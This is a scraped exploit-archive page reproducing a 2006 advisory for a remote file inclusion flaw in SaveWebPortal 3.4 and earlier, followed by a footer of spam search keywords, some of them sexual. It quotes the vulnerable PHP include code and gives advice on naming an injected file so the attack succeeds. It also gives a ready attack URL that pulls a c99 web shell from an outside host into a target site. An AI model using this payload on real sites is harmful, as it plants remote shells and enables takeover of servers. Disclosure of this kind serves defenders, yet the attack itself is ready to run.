about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , SaveWebPortal <= 3.4 (page) Remote File Inclusion Vulnerability




2006-08-10 SaveWebPortal <= 3.4 (page) Remote File Inclusion Vulnerability 
Rated as : High Risk

--------------------------------------------
SaveWebPortal <= 3.4(page) Remote File Inclusion Vulnerability
Download:http://www.circeos.it/frontend/theme4/index.php?page=downloads
--------------------------------------------
Found by x0rax
Master9976@hotmail.de
--------------------------------------------
Vulnerable Code:
<?php
....
if (strstr ($page, ".php") ||
                       strstr ($page, ".htm") ||
                       strstr ($page, ".html")) {
                       include ("$page");
....
?>
--------------------------------------------
to inject succesfully you have to create a file called shell.html.txt or
shell.php.txt
otherwise it wont work!
--------------------------------------------
Affected File:
index.php =]
--------------------------------------------
Vulnerability:
http://host.com/index.php?page=http://master-boy.cwsurf.de/c99.php.txt
--------------------------------------------
securitydot.net - 2006-08-10

Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 00:40:43 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
hijab t549t asinimages Www.anemal Www.anemal atm www.pink w saniyamirs SUN SEXY.GIRL. www.dldvb. www.skj360 www sex 30 www.lexsen sex filims wwwmmm100 aimengjie. p.../dump/ wwwmmm100 rcpbind Crack Data custom cms sex xxl IBP karena sex Maduredece sixe woman www.bangla sex xxl parbatsar news for C tampil gam www.daseba Thirsa.sex WWW.TAMIL Xxx Pictur port 1025 www.dunia3 www.bu12.c Blow ip+board+2 tyujg WWW SANIYA Www.bluefl www.tcjob. era www.lianme verynicevi wwsexo.com FRONTPAGE